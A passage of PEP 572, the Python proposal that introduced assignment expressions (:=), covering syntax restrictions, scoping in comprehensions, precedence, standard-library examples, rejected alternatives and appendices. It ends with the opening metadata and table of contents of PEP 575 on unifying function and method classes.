match2 = pattern2.match(data)
if match1:
    result = match1.group(1)
elif match2:
    result = match2.group(2)
else:
    result = None
This code tries to match pattern2 even if pattern1 has a match
(in which case the match on pattern2 is never used). The more
efficient rewrite would have been:
match1 = pattern1.match(data)
if match1:
    result = match1.group(1)
else:
    match2 = pattern2.match(data)
    if match2:
        result = match2.group(2)
    else:
        result = None
Syntax and semantics
In most contexts where arbitrary Python expressions can be used, a
named expression can appear. This is of the form NAME := expr
where expr is any valid Python expression other than an
unparenthesized tuple, and NAME is an identifier.
The value of such a named expression is the same as the incorporated
expression, with the additional side-effect that the target is assigned
that value:
# Handle a matched regex
if (match := pattern.search(data)) is not None:
    # Do something with match
    ...

# A loop that can't be trivially rewritten using 2-arg iter()
while chunk := file.read(8192):
    process(chunk)

# Reuse a value that's expensive to compute
[y := f(x), y**2, y**3]

# Share a subexpression between a comprehension filter clause and its output
filtered_data = [y for x in data if (y := f(x)) is not None]
Exceptional cases
There are a few places where assignment expressions are not allowed,
in order to avoid ambiguities or user confusion:
Unparenthesized assignment expressions are prohibited at the top
level of an expression statement. Example:

y := f(x)  # INVALID
(y := f(x))  # Valid, though not recommended
This rule is included to simplify the choice for the user between an
assignment statement and an assignment expression – there is no
syntactic position where both are valid.
Unparenthesized assignment expressions are prohibited at the top
level of the right hand side of an assignment statement. Example:

y0 = y1 := f(x)  # INVALID
y0 = (y1 := f(x))  # Valid, though discouraged
Again, this rule is included to avoid two visually similar ways of
saying the same thing.
Unparenthesized assignment expressions are prohibited for the value
of a keyword argument in a call. Example:

foo(x = y := f(x))  # INVALID
foo(x=(y := f(x)))  # Valid, though probably confusing
This rule is included to disallow excessively confusing code, and
because parsing keyword arguments is complex enough already.
Unparenthesized assignment expressions are prohibited at the top
level of a function default value. Example:

def foo(answer = p := 42):  # INVALID
    ...

def foo(answer=(p := 42)):  # Valid, though not great style
    ...
This rule is included to discourage side effects in a position whose
exact semantics are already confusing to many users (cf. the common
style recommendation against mutable default values), and also to
echo the similar prohibition in calls (the previous bullet).
Unparenthesized assignment expressions are prohibited as annotations
for arguments, return values and assignments. Example:

def foo(answer: p := 42 = 5):  # INVALID
    ...

def foo(answer: (p := 42) = 5):  # Valid, but probably never useful
    ...
The reasoning here is similar to the two previous cases; this
ungrouped assortment of symbols and operators composed of : and
= is hard to read correctly.
Unparenthesized assignment expressions are prohibited in lambda functions.
Example:

(lambda: x := 1)  # INVALID
lambda: (x := 1)  # Valid, but unlikely to be useful
(x := lambda: 1)  # Valid
lambda line: (m := re.match(pattern, line)) and m.group(1)  # Valid
This allows lambda to always bind less tightly than :=; having a
name binding at the top level inside a lambda function is unlikely to be of
value, as there is no way to make use of it. In cases where the name will be
used more than once, the expression is likely to need parenthesizing anyway,
so this prohibition will rarely affect code.
Assignment expressions inside of f-strings require parentheses. Example:

>>> f'{(x:=10)}'  # Valid, uses assignment expression
'10'
>>> x = 10
>>> f'{x:=10}'  # Valid, passes '=10' to formatter
' 10'
This shows that what looks like an assignment operator in an f-string is
not always an assignment operator. The f-string parser uses : to
indicate formatting options. To preserve backwards compatibility,
assignment operator usage inside of f-strings must be parenthesized.
As noted above, this usage of the assignment operator is not recommended.
Scope of the target
An assignment expression does not introduce a new scope. In most
cases the scope in which the target will be bound is self-explanatory:
it is the current scope. If this scope contains a nonlocal or
global declaration for the target, the assignment expression
honors that. A lambda (being an explicit, if anonymous, function
definition) counts as a scope for this purpose.
There is one special case: an assignment expression occurring in a
list, set or dict comprehension or in a generator expression (below
collectively referred to as “comprehensions”) binds the target in the
containing scope, honoring a nonlocal or global declaration
for the target in that scope, if one exists. For the purpose of this
rule the containing scope of a nested comprehension is the scope that
contains the outermost comprehension. A lambda counts as a containing
scope.
The motivation for this special case is twofold. First, it allows us
to conveniently capture a “witness” for an any() expression, or a
counterexample for all(), for example:
if any((comment := line).startswith('#') for line in lines):
    print("First comment:", comment)
else:
    print("There are no comments")

if all((nonblank := line).strip() == '' for line in lines):
    print("All lines are blank")
else:
    print("First non-blank line:", nonblank)
Second, it allows a compact way of updating mutable state from a
comprehension, for example:
# Compute partial sums in a list comprehension
total = 0
partial_sums = [total := total + v for v in values]
print("Total:", total)
However, an assignment expression target name cannot be the same as a
for-target name appearing in any comprehension containing the
assignment expression. The latter names are local to the
comprehension in which they appear, so it would be contradictory for a
contained use of the same name to refer to the scope containing the
outermost comprehension instead.
For example, [i := i+1 for i in range(5)] is invalid: the for
i part establishes that i is local to the comprehension, but the
i := part insists that i is not local to the comprehension.
The same reason makes these examples invalid too:
[[(j := j) for i in range(5)] for j in range(5)] # INVALID
[i := 0 for i, j in stuff] # INVALID
[i+1 for i in (i := stuff)] # INVALID
While it’s technically possible to assign consistent semantics to these cases,
it’s difficult to determine whether those semantics actually make sense in the
absence of real use cases. Accordingly, the reference implementation [1] will ensure
that such cases raise SyntaxError, rather than executing with implementation
defined behaviour.
This restriction applies even if the assignment expression is never executed:
[False and (i := 0) for i, j in stuff] # INVALID
[i for i, j in stuff if True or (j := 1)] # INVALID
For the comprehension body (the part before the first “for” keyword) and the
filter expression (the part after “if” and before any nested “for”), this
restriction applies solely to target names that are also used as iteration
variables in the comprehension. Lambda expressions appearing in these
positions introduce a new explicit function scope, and hence may use assignment
expressions with no additional restrictions.
Due to design constraints in the reference implementation (the symbol table
analyser cannot easily detect when names are re-used between the leftmost
comprehension iterable expression and the rest of the comprehension), named
expressions are disallowed entirely as part of comprehension iterable
expressions (the part after each “in”, and before any subsequent “if” or
“for” keyword):
[i+1 for i in (j := stuff)] # INVALID
[i+1 for i in range(2) for j in (k := stuff)] # INVALID
[i+1 for i in [j for j in (k := stuff)]] # INVALID
[i+1 for i in (lambda: (j := stuff))()] # INVALID
A further exception applies when an assignment expression occurs in a
comprehension whose containing scope is a class scope. If the rules
above were to result in the target being assigned in that class’s
scope, the assignment expression is expressly invalid. This case also raises
SyntaxError:
class Example:
    [(j := i) for i in range(5)]  # INVALID
(The reason for the latter exception is the implicit function scope created
for comprehensions – there is currently no runtime mechanism for a
function to refer to a variable in the containing class scope, and we
do not want to add such a mechanism. If this issue ever gets resolved
this special case may be removed from the specification of assignment
expressions. Note that the problem already exists for using a
variable defined in the class scope from a comprehension.)
See Appendix B for some examples of how the rules for targets in
comprehensions translate to equivalent code.
Relative precedence of :=
The := operator groups more tightly than a comma in all syntactic
positions where it is legal, but less tightly than all other operators,
including or, and, not, and conditional expressions
(A if C else B). As follows from section
“Exceptional cases” above, it is never allowed at the same level as
=. In case a different grouping is desired, parentheses should be
used.
The := operator may be used directly in a positional function call
argument; however it is invalid directly in a keyword argument.
Some examples to clarify what’s technically valid or invalid:
# INVALID
x := 0
# Valid alternative
(x := 0)
# INVALID
x = y := 0
# Valid alternative
x = (y := 0)
# Valid
len(lines := f.readlines())
# Valid
foo(x := 3, cat='vector')
# INVALID
foo(cat=category := 'vector')
# Valid alternative
foo(cat=(category := 'vector'))
Most of the “valid” examples above are not recommended, since human
readers of Python source code who are quickly glancing at some code
may miss the distinction. But simple cases are not objectionable:
# Valid
if any(len(longline := line) >= 100 for line in lines):
    print("Extremely long line:", longline)
This PEP recommends always putting spaces around :=, similar to
PEP 8’s recommendation for = when used for assignment, whereas the
latter disallows spaces around = used for keyword arguments.
Change to evaluation order
In order to have precisely defined semantics, the proposal requires
evaluation order to be well-defined. This is technically not a new
requirement, as function calls may already have side effects. Python
already has a rule that subexpressions are generally evaluated from
left to right. However, assignment expressions make these side
effects more visible, and we propose a single change to the current
evaluation order:
In a dict comprehension {X: Y for ...}, Y is currently
evaluated before X. We propose to change this so that X is
evaluated before Y. (In a dict display like {X: Y} this is
already the case, and also in dict((X, Y) for ...) which should
clearly be equivalent to the dict comprehension.)
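A small sketch of why this ordering matters (the names here are
illustrative):

# With keys evaluated first, the walrus binding made in the key
# expression can be reused in the value expression:
data = ['a', 'bb', 'ccc']
lengths = {(n := len(s)): n ** 2 for s in data}
# -> {1: 1, 2: 4, 3: 9}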
Differences between assignment expressions and assignment statements
Most importantly, since := is an expression, it can be used in contexts
where statements are illegal, including lambda functions and comprehensions.
Conversely, assignment expressions don’t support the advanced features
found in assignment statements:
Multiple targets are not directly supported:

x = y = z = 0  # Equivalent: (z := (y := (x := 0)))

Single assignment targets other than a single NAME are
not supported:

# No equivalent
a[i] = x
self.rest = []

Priority around commas is different:

x = 1, 2  # Sets x to (1, 2)
(x := 1, 2)  # Sets x to 1

Iterable packing and unpacking (both regular or extended forms) are
not supported:

# Equivalent needs extra parentheses
loc = x, y  # Use (loc := (x, y))
info = name, phone, *rest  # Use (info := (name, phone, *rest))

# No equivalent
px, py, pz = position
name, phone, email, *other_info = contact

Inline type annotations are not supported:

# Closest equivalent is "p: Optional[int]" as a separate declaration
p: Optional[int] = None

Augmented assignment is not supported:

total += tax  # Equivalent: (total := total + tax)
Specification changes during implementation
The following changes have been made based on implementation experience and
additional review after the PEP was first accepted and before Python 3.8 was
released:
for consistency with other similar exceptions, and to avoid locking in an
exception name that is not necessarily going to improve clarity for end users,
the originally proposed TargetScopeError subclass of SyntaxError was
dropped in favour of just raising SyntaxError directly. [3]
due to a limitation in CPython’s symbol table analysis process, the reference
implementation raises SyntaxError for all uses of named expressions inside
comprehension iterable expressions, rather than only raising them when the
named expression target conflicts with one of the iteration variables in the
comprehension. This could be revisited given sufficiently compelling examples,
but the extra complexity needed to implement the more selective restriction
doesn’t seem worthwhile for purely hypothetical use cases.
Examples
Examples from the Python standard library
site.py
env_base is only used on these lines, putting its assignment on the if
moves it as the “header” of the block.
Current:

env_base = os.environ.get("PYTHONUSERBASE", None)
if env_base:
    return env_base

Improved:

if env_base := os.environ.get("PYTHONUSERBASE", None):
    return env_base
_pydecimal.py
Avoid nested if and remove one indentation level.
Current:

if self._is_special:
    ans = self._check_nans(context=context)
    if ans:
        return ans

Improved:

if self._is_special and (ans := self._check_nans(context=context)):
    return ans
copy.py
Code looks more regular and avoids multiple nested if.
(See Appendix A for the origin of this example.)
Current:

reductor = dispatch_table.get(cls)
if reductor:
    rv = reductor(x)
else:
    reductor = getattr(x, "__reduce_ex__", None)
    if reductor:
        rv = reductor(4)
    else:
        reductor = getattr(x, "__reduce__", None)
        if reductor:
            rv = reductor()
        else:
            raise Error(
                "un(deep)copyable object of type %s" % cls)

Improved:

if reductor := dispatch_table.get(cls):
    rv = reductor(x)
elif reductor := getattr(x, "__reduce_ex__", None):
    rv = reductor(4)
elif reductor := getattr(x, "__reduce__", None):
    rv = reductor()
else:
    raise Error("un(deep)copyable object of type %s" % cls)
datetime.py
tz is only used for s += tz, moving its assignment inside the if
helps to show its scope.
Current:

s = _format_time(self._hour, self._minute,
                 self._second, self._microsecond,
                 timespec)
tz = self._tzstr()
if tz:
    s += tz
return s

Improved:

s = _format_time(self._hour, self._minute,
                 self._second, self._microsecond,
                 timespec)
if tz := self._tzstr():
    s += tz
return s
sysconfig.py
Calling fp.readline() in the while condition and calling
.match() on the if lines make the code more compact without making
it harder to understand.
Current:

while True:
    line = fp.readline()
    if not line:
        break
    m = define_rx.match(line)
    if m:
        n, v = m.group(1, 2)
        try:
            v = int(v)
        except ValueError:
            pass
        vars[n] = v
    else:
        m = undef_rx.match(line)
        if m:
            vars[m.group(1)] = 0

Improved:

while line := fp.readline():
    if m := define_rx.match(line):
        n, v = m.group(1, 2)
        try:
            v = int(v)
        except ValueError:
            pass
        vars[n] = v
    elif m := undef_rx.match(line):
        vars[m.group(1)] = 0
Simplifying list comprehensions
A list comprehension can map and filter efficiently by capturing
the condition:
results = [(x, y, x/y) for x in input_data if (y := f(x)) > 0]
Similarly, a subexpression can be reused within the main expression, by
giving it a name on first use:
stuff = [[y := f(x), x/y] for x in range(5)]
Note that in both cases the variable y is bound in the containing
scope (i.e. at the same level as results or stuff).
Capturing condition values
Assignment expressions can be used to good effect in the header of
an if or while statement:
# Loop-and-a-half
while (command := input("> ")) != "quit":
    print("You entered:", command)

# Capturing regular expression match objects
# See, for instance, Lib/pydoc.py, which uses a multiline spelling
# of this effect
if match := re.search(pat, text):
    print("Found:", match.group(0))
# The same syntax chains nicely into 'elif' statements, unlike the
# equivalent using assignment statements.
elif match := re.search(otherpat, text):
    print("Alternate found:", match.group(0))
elif match := re.search(third, text):
    print("Fallback found:", match.group(0))

# Reading socket data until an empty string is returned
while data := sock.recv(8192):
    print("Received data:", data)
Particularly with the while loop, this can remove the need to have an
infinite loop, an assignment, and a condition. It also creates a smooth
parallel between a loop which simply uses a function call as its condition,
and one which uses that as its condition but also uses the actual value.
Fork
An example from the low-level UNIX world:
if pid := os.fork():
    # Parent code
else:
    # Child code
Rejected alternative proposals
Proposals broadly similar to this one have come up frequently on python-ideas.
Below are a number of alternative syntaxes, some of them specific to
comprehensions, which have been rejected in favour of the one given above.
Changing the scope rules for comprehensions
A previous version of this PEP proposed subtle changes to the scope
rules for comprehensions, to make them more usable in class scope and
to unify the scope of the “outermost iterable” and the rest of the
comprehension. However, this part of the proposal would have caused
backwards incompatibilities, and has been withdrawn so the PEP can
focus on assignment expressions.
Alternative spellings
Broadly the same semantics as the current proposal, but spelled differently.
EXPR as NAME:
stuff = [[f(x) as y, x/y] for x in range(5)]
Since EXPR as NAME already has meaning in import,
except and with statements (with different semantics), this
would create unnecessary confusion or require special-casing
(e.g. to forbid assignment within the headers of these statements).
(Note that with EXPR as VAR does not simply assign the value
of EXPR to VAR – it calls EXPR.__enter__() and assigns
the result of that to VAR.)
Additional reasons to prefer := over this spelling include:
In if f(x) as y the assignment target doesn’t jump out at you
– it just reads like if f x blah blah and it is too similar
visually to if f(x) and y.
In all other situations where an as clause is allowed, even
readers with intermediate skills are led to anticipate that
clause (however optional) by the keyword that starts the line,
and the grammar ties that keyword closely to the as clause:
import foo as bar
except Exc as var
with ctxmgr() as var
To the contrary, the assignment expression does not belong to the
if or while that starts the line, and we intentionally
allow assignment expressions in other contexts as well.
The parallel cadence between
NAME = EXPR
if NAME := EXPR
reinforces the visual recognition of assignment expressions.
EXPR -> NAME:
stuff = [[f(x) -> y, x/y] for x in range(5)]
This syntax is inspired by languages such as R and Haskell, and some
programmable calculators. (Note that a left-facing arrow y <- f(x) is
not possible in Python, as it would be interpreted as less-than and unary
minus.) This syntax has a slight advantage over ‘as’ in that it does not
conflict with with, except and import, but otherwise is
equivalent. But it is entirely unrelated to Python’s other use of
-> (function return type annotations), and compared to :=
(which dates back to Algol-58) it has a much weaker tradition.
Adorning statement-local names with a leading dot:
stuff = [[(f(x) as .y), x/.y] for x in range(5)] # with "as"
stuff = [[(.y := f(x)), x/.y] for x in range(5)] # with ":="
This has the advantage that leaked usage can be readily detected, removing
some forms of syntactic ambiguity. However, this would be the only place
in Python where a variable’s scope is encoded into its name, making
refactoring harder.
Adding a where: to any statement to create local name bindings:
value = x**2 + 2*x where:
    x = spam(1, 4, 7, q)
Execution order is inverted (the indented body is performed first, followed
by the “header”). This requires a new keyword, unless an existing keyword
is repurposed (most likely with:). See PEP 3150 for prior discussion
on this subject (with the proposed keyword being given:).
TARGET from EXPR:
stuff = [[y from f(x), x/y] for x in range(5)]
This syntax has fewer conflicts than as does (conflicting only with the
raise Exc from Exc notation), but is otherwise comparable to it. Instead
of paralleling with expr as target: (which can be useful but can also be
confusing), this has no parallels, but is evocative.
Special-casing conditional statements
One of the most popular use-cases is if and while statements. Instead
of a more general solution, this proposal enhances the syntax of these two
statements to add a means of capturing the compared value:
if re.search(pat, text) as match:
print("Found:", match.group(0))
This works beautifully if and ONLY if the desired condition is based on the
truthiness of the captured value. It is thus effective for specific
use-cases (regex matches, socket reads that return '' when done), and
completely useless in more complicated cases (e.g. where the condition is
f(x) < 0 and you want to capture the value of f(x)). It also has
no benefit to list comprehensions.
Advantages: No syntactic ambiguities. Disadvantages: Answers only a fraction
of possible use-cases, even in if/while statements.
Special-casing comprehensions
Another common use-case is comprehensions (list/set/dict, and genexps). As
above, proposals have been made for comprehension-specific solutions.
where, let, or given:
stuff = [(y, x/y) where y = f(x) for x in range(5)]
stuff = [(y, x/y) let y = f(x) for x in range(5)]
stuff = [(y, x/y) given y = f(x) for x in range(5)]
This brings the subexpression to a location in between the ‘for’ loop and
the expression. It introduces an additional language keyword, which creates
conflicts. Of the three, where reads the most cleanly, but also has the
greatest potential for conflict (e.g. SQLAlchemy and numpy have where
methods, as does tkinter.dnd.Icon in the standard library).
with NAME = EXPR:
stuff = [(y, x/y) with y = f(x) for x in range(5)]
As above, but reusing the with keyword. Doesn’t read too badly, and needs
no additional language keyword. Is restricted to comprehensions, though,
and cannot as easily be transformed into “longhand” for-loop syntax. Has
the C problem that an equals sign in an expression can now create a name
binding, rather than performing a comparison. Would raise the question of
why “with NAME = EXPR:” cannot be used as a statement on its own.
with EXPR as NAME:
stuff = [(y, x/y) with f(x) as y for x in range(5)]
As per option 2, but using as rather than an equals sign. Aligns
syntactically with other uses of as for name binding, but a simple
transformation to for-loop longhand would create drastically different
semantics; the meaning of with inside a comprehension would be
completely different from the meaning as a stand-alone statement, while
retaining identical syntax.
Regardless of the spelling chosen, this introduces a stark difference between
comprehensions and the equivalent unrolled long-hand form of the loop. It is
no longer possible to unwrap the loop into statement form without reworking
any name bindings. The only keyword that can be repurposed to this task is
with, thus giving it sneakily different semantics in a comprehension than
in a statement; alternatively, a new keyword is needed, with all the costs
therein.
Lowering operator precedence
There are two logical precedences for the := operator. Either it should
bind as loosely as possible, as does statement-assignment; or it should bind
more tightly than comparison operators. Placing its precedence between the
comparison and arithmetic operators (to be precise: just lower than bitwise
OR) allows most uses inside while and if conditions to be spelled
without parentheses, as it is most likely that you wish to capture the value
of something, then perform a comparison on it:
pos = -1
while pos := buffer.find(search_term, pos + 1) >= 0:
    ...
Once find() returns -1, the loop terminates. If := binds as loosely as
= does, this would capture the result of the comparison (generally either
True or False), which is less useful.
While this behaviour would be convenient in many situations, it is also harder
to explain than “the := operator behaves just like the assignment statement”,
and as such, the precedence for := has been made as close as possible to
that of = (with the exception that it binds tighter than comma).
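With the adopted precedence, the buffer-scanning loop above therefore needs explicit parentheses around the assignment expression. The following runnable rewrite illustrates this; the values of buffer and search_term are chosen here purely for demonstration:
buffer = "spam spam spam"
search_term = "spam"
pos = -1
while (pos := buffer.find(search_term, pos + 1)) >= 0:
    print("found at", pos)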
Allowing commas to the right
Some critics have claimed that the assignment expressions should allow
unparenthesized tuples on the right, so that these two would be equivalent:
(point := (x, y))
(point := x, y)
(With the current version of the proposal, the latter would be
equivalent to ((point := x), y).)
However, adopting this stance would logically lead to the conclusion
that when used in a function call, assignment expressions also bind
less tightly than comma, so we’d have the following confusing equivalence:
foo(x := 1, y)
foo(x := (1, y))
The less confusing option is to make := bind more tightly than comma.
Always requiring parentheses
It’s been proposed to just always require parentheses around an
assignment expression. This would resolve many ambiguities, and
indeed parentheses will frequently be needed to extract the desired
subexpression. But in the following cases the extra parentheses feel
redundant:
# Top level in if
if match := pattern.match(line):
    return match.group(1)

# Short call
len(lines := f.readlines())
Frequently Raised Objections
Why not just turn existing assignment into an expression?
C and its derivatives define the = operator as an expression, rather than
a statement as is Python’s way. This allows assignments in more contexts,
including contexts where comparisons are more common. The syntactic similarity
between if (x == y) and if (x = y) belies their drastically different
semantics. Thus this proposal uses := to clarify the distinction.
With assignment expressions, why bother with assignment statements?
The two forms have different flexibilities. The := operator can be used
inside a larger expression; the = statement can be augmented to += and
its friends, can be chained, and can assign to attributes and subscripts.
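A short runnable sketch of those statement-only capabilities (the names used are illustrative only):
class Box:
    pass

obj, data = Box(), [0]

x = y = 0       # chaining
x += 1          # augmented assignment
obj.attr = 1    # attribute target
data[0] = 1     # subscript target
# None of these forms is available with :=, which can only bind a simple name.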
Why not use a sublocal scope and prevent namespace pollution?
Previous revisions of this proposal involved sublocal scope (restricted to a
single statement), preventing name leakage and namespace pollution. While a
definite advantage in a number of situations, this increases complexity in
many others, and the costs are not justified by the benefits. In the interests
of language simplicity, the name bindings created here are exactly equivalent
to any other name bindings, including that usage at class or module scope will
create externally-visible names. This is no different from for loops or
other constructs, and can be solved the same way: del the name once it is
no longer needed, or prefix it with an underscore.
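For example, a module that does not want to expose the temporary name can simply delete it afterwards; a small illustrative sketch:
# At module scope the target of := is an ordinary module-level name.
values = [y := 10, y ** 2, y ** 3]

# Drop the helper once it is no longer needed, exactly as one would
# after a module-level for loop.
del y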
(The author wishes to thank Guido van Rossum and Christoph Groth for their
suggestions to move the proposal in this direction. [2])
Style guide recommendations
As expression assignments can sometimes be used equivalently to statement
assignments, the question of which should be preferred will arise. For the
benefit of style guides such as PEP 8, two recommendations are suggested.
If either assignment statements or assignment expressions can be
used, prefer statements; they are a clear declaration of intent.
If using assignment expressions would lead to ambiguity about
execution order, restructure it to use statements instead.
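As a hedged illustration of the first recommendation (an example invented here, not taken from any style guide):
def f(x):
    return x - 5

x = 10

# Preferred: a plain statement when nothing else needs the value inline.
y = f(x)

# Reserve the assignment expression for when the value is used
# immediately inside a larger expression.
if (y := f(x)) > 0:
    print(y)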
Acknowledgements
The authors wish to thank Alyssa Coghlan and Steven D’Aprano for their
considerable contributions to this proposal, and members of the
core-mentorship mailing list for assistance with implementation.
Appendix A: Tim Peters’s findings
Here’s a brief essay Tim Peters wrote on the topic.
I dislike “busy” lines of code, and also dislike putting conceptually
unrelated logic on a single line. So, for example, instead of:
i = j = count = nerrors = 0
I prefer:
i = j = 0
count = 0
nerrors = 0
instead. So I suspected I’d find few places I’d want to use
assignment expressions. I didn’t even consider them for lines already
stretching halfway across the screen. In other cases, “unrelated”
ruled:
mylast = mylast[1]
yield mylast[0]
is a vast improvement over the briefer:
yield (mylast := mylast[1])[0]
The original two statements are doing entirely different conceptual
things, and slamming them together is conceptually insane.
In other cases, combining related logic made it harder to understand,
such as rewriting:
while True:
    old = total
    total += term
    if old == total:
        return total
    term *= mx2 / (i*(i+1))
    i += 2
as the briefer:
while total != (total := total + term):
    term *= mx2 / (i*(i+1))
    i += 2
return total
The while test there is too subtle, crucially relying on strict
left-to-right evaluation in a non-short-circuiting or method-chaining
context. My brain isn’t wired that way.
But cases like that were rare. Name binding is very frequent, and
“sparse is better than dense” does not mean “almost empty is better
than sparse”. For example, I have many functions that return None
or 0 to communicate “I have nothing useful to return in this case,
but since that’s expected often I’m not going to annoy you with an
exception”. This is essentially the same as regular expression search
functions returning None when there is no match. So there was lots
of code of the form:
result = solution(xs, n)
if result:
    # use result
I find that clearer, and certainly a bit less typing and
pattern-matching reading, as:
if result := solution(xs, n):
    # use result
It’s also nice to trade away a small amount of horizontal whitespace
to get another _line_ of surrounding code on screen. I didn’t give
much weight to this at first, but it was so very frequent it added up,
and I soon enough became annoyed that I couldn’t actually run the
briefer code. That surprised me!
There are other cases where assignment expressions really shine.
Rather than pick another from my code, Kirill Balunov gave a lovely
example from the standard library’s copy() function in copy.py:
reductor = dispatch_table.get(cls)
if reductor:
    rv = reductor(x)
else:
    reductor = getattr(x, "__reduce_ex__", None)
    if reductor:
        rv = reductor(4)
    else:
        reductor = getattr(x, "__reduce__", None)
        if reductor:
            rv = reductor()
        else:
            raise Error("un(shallow)copyable object of type %s" % cls)
The ever-increasing indentation is semantically misleading: the logic
is conceptually flat, “the first test that succeeds wins”:
if reductor := dispatch_table.get(cls):
    rv = reductor(x)
elif reductor := getattr(x, "__reduce_ex__", None):
    rv = reductor(4)
elif reductor := getattr(x, "__reduce__", None):
    rv = reductor()
else:
    raise Error("un(shallow)copyable object of type %s" % cls)
Using easy assignment expressions allows the visual structure of the
code to emphasize the conceptual flatness of the logic;
ever-increasing indentation obscured it.
A smaller example from my code delighted me, both allowing to put
inherently related logic in a single line, and allowing to remove an
annoying “artificial” indentation level:
diff = x - x_base
if diff:
    g = gcd(diff, n)
    if g > 1:
        return g
became:
if (diff := x - x_base) and (g := gcd(diff, n)) > 1:
    return g
That if is about as long as I want my lines to get, but remains easy
to follow.
So, in all, in most lines binding a name, I wouldn’t use assignment
expressions, but because that construct is so very frequent, that
leaves many places I would. In most of the latter, I found a small
win that adds up due to how often it occurs, and in the rest I found a
moderate to major win. I’d certainly use it more often than ternary
if, but significantly less often than augmented assignment.
A numeric example
I have another example that quite impressed me at the time.
Where all variables are positive integers, and a is at least as large
as the n’th root of x, this algorithm returns the floor of the n’th
root of x (roughly doubling the number of accurate bits per
iteration):
while a > (d := x // a**(n-1)):
    a = ((n-1)*a + d) // n
return a
It’s not obvious why that works, but is no more obvious in the “loop
and a half” form. It’s hard to prove correctness without building on
the right insight (the “arithmetic mean - geometric mean inequality”),
and knowing some non-trivial things about how nested floor functions
behave. That is, the challenges are in the math, not really in the
coding.
If you do know all that, then the assignment-expression form is easily
read as “while the current guess is too large, get a smaller guess”,
where the “too large?” test and the new guess share an expensive
sub-expression.
To my eyes, the original form is harder to understand:
while True:
    d = x // a**(n-1)
    if a <= d:
        break
    a = ((n-1)*a + d) // n
return a
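For completeness, here is a minimal runnable wrapping of the assignment-expression form shown earlier in this section. The function name iroot and the initial guess a = x are choices made here for illustration; any starting value of a that is at least the n’th root of x works:
def iroot(x, n):
    # Floor of the n'th root of a positive integer x, for n >= 1.
    a = x  # for x >= 1, x itself is always >= the n'th root of x
    while a > (d := x // a ** (n - 1)):
        a = ((n - 1) * a + d) // n
    return a

assert iroot(100, 2) == 10
assert iroot(2 ** 60 + 1, 3) == 2 ** 20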
Appendix B: Rough code translations for comprehensions
This appendix attempts to clarify (though not specify) the rules when
a target occurs in a comprehension or in a generator expression.
For a number of illustrative examples we show the original code,
containing a comprehension, and the translation, where the
comprehension has been replaced by an equivalent generator function
plus some scaffolding.
Since [x for ...] is equivalent to list(x for ...) these
examples all use list comprehensions without loss of generality.
And since these examples are meant to clarify edge cases of the rules,
they aren’t trying to look like real code.
Note: comprehensions are already implemented via synthesizing nested
generator functions like those in this appendix. The new part is
adding appropriate declarations to establish the intended scope of
assignment expression targets (the same scope they resolve to as if
the assignment were performed in the block containing the outermost
comprehension). For type inference purposes, these illustrative
expansions do not imply that assignment expression targets are always
Optional (but they do indicate the target binding scope).
Let’s start with a reminder of what code is generated for a generator
expression without assignment expression.
Original code (EXPR usually references VAR):
def f():
    a = [EXPR for VAR in ITERABLE]
Translation (let’s not worry about name conflicts):
def f():
    def genexpr(iterator):
        for VAR in iterator:
            yield EXPR
    a = list(genexpr(iter(ITERABLE)))
Let’s add a simple assignment expression.
Original code:
def f():
    a = [TARGET := EXPR for VAR in ITERABLE]
Translation:
def f():
    if False:
        TARGET = None  # Dead code to ensure TARGET is a local variable
    def genexpr(iterator):
        nonlocal TARGET
        for VAR in iterator:
            TARGET = EXPR
            yield TARGET
    a = list(genexpr(iter(ITERABLE)))
Let’s add a global TARGET declaration in f().
Original code:
def f():
    global TARGET
    a = [TARGET := EXPR for VAR in ITERABLE]
Translation:
def f():
    global TARGET
    def genexpr(iterator):
        global TARGET
        for VAR in iterator:
            TARGET = EXPR
            yield TARGET
    a = list(genexpr(iter(ITERABLE)))
Or instead let’s add a nonlocal TARGET declaration in f().
Original code:
def g():
    TARGET = ...
    def f():
        nonlocal TARGET
        a = [TARGET := EXPR for VAR in ITERABLE]
Translation:
def g():
    TARGET = ...
    def f():
        nonlocal TARGET
        def genexpr(iterator):
            nonlocal TARGET
            for VAR in iterator:
                TARGET = EXPR
                yield TARGET
        a = list(genexpr(iter(ITERABLE)))
Finally, let’s nest two comprehensions.
Original code:
def f():
    a = [[TARGET := i for i in range(3)] for j in range(2)]
    # I.e., a = [[0, 1, 2], [0, 1, 2]]
    print(TARGET)  # prints 2
Translation:
def f():
    if False:
        TARGET = None
    def outer_genexpr(outer_iterator):
        nonlocal TARGET
        def inner_generator(inner_iterator):
            nonlocal TARGET
            for i in inner_iterator:
                TARGET = i
                yield i
        for j in outer_iterator:
            yield list(inner_generator(range(3)))
    a = list(outer_genexpr(range(2)))
    print(TARGET)
Appendix C: No Changes to Scope Semantics
Because it has been a point of confusion, note that nothing about Python’s
scoping semantics is changed. Function-local scopes continue to be resolved
at compile time, and to have indefinite temporal extent at run time (“full
closures”). Example:
a = 42
def f():
    # `a` is local to `f`, but remains unbound
    # until the caller executes this genexp:
    yield ((a := i) for i in range(3))
    yield lambda: a + 100
    print("done")
    try:
        print(f"`a` is bound to {a}")
        assert False
    except UnboundLocalError:
        print("`a` is not yet bound")
Then:
>>> results = list(f()) # [genexp, lambda]
done
`a` is not yet bound
# The execution frame for f no longer exists in CPython,
# but f's locals live so long as they can still be referenced.
>>> list(map(type, results))
[<class 'generator'>, <class 'function'>]
>>> list(results[0])
[0, 1, 2]
>>> results[1]()
102
>>> a
42
References
[1]
Proof of concept implementation
(https://github.com/Rosuav/cpython/tree/assignment-expressions)
[2]
Pivotal post regarding inline assignment semantics
(https://mail.python.org/pipermail/python-ideas/2018-March/049409.html)
[3]
Discussion of PEP 572 TargetScopeError
(https://mail.python.org/archives/list/[email protected]/thread/FXVSYCTQOTT7JCFACKPGPXKULBCGEPQY/)
Copyright
This document has been placed in the public domain.
| Final | PEP 572 – Assignment Expressions | Standards Track | This is a proposal for creating a way to assign to variables within an
expression using the notation NAME := expr. |
PEP 575 – Unifying function/method classes
Author:
Jeroen Demeyer <J.Demeyer at UGent.be>
Status:
Withdrawn
Type:
Standards Track
Created:
27-Mar-2018
Python-Version:
3.8
Post-History:
31-Mar-2018, 12-Apr-2018, 27-Apr-2018, 05-May-2018
Table of Contents
Withdrawal notice
Abstract
Motivation
New classes
base_function
cfunction
defined_function
function
bound_method
Calling base_function instances
Checking __objclass__
Flags
Self slicing
METH_PASS_FUNCTION
METH_FASTCALL
Automatic creation of built-in functions
Unbound methods of extension types
Built-in functions of a module
Further changes
New type flag
C API functions
Changes to the types module
Changes to the inspect module
Profiling
Non-CPython implementations
Rationale
Why not simply change existing classes?
Why __text_signature__ is not a solution
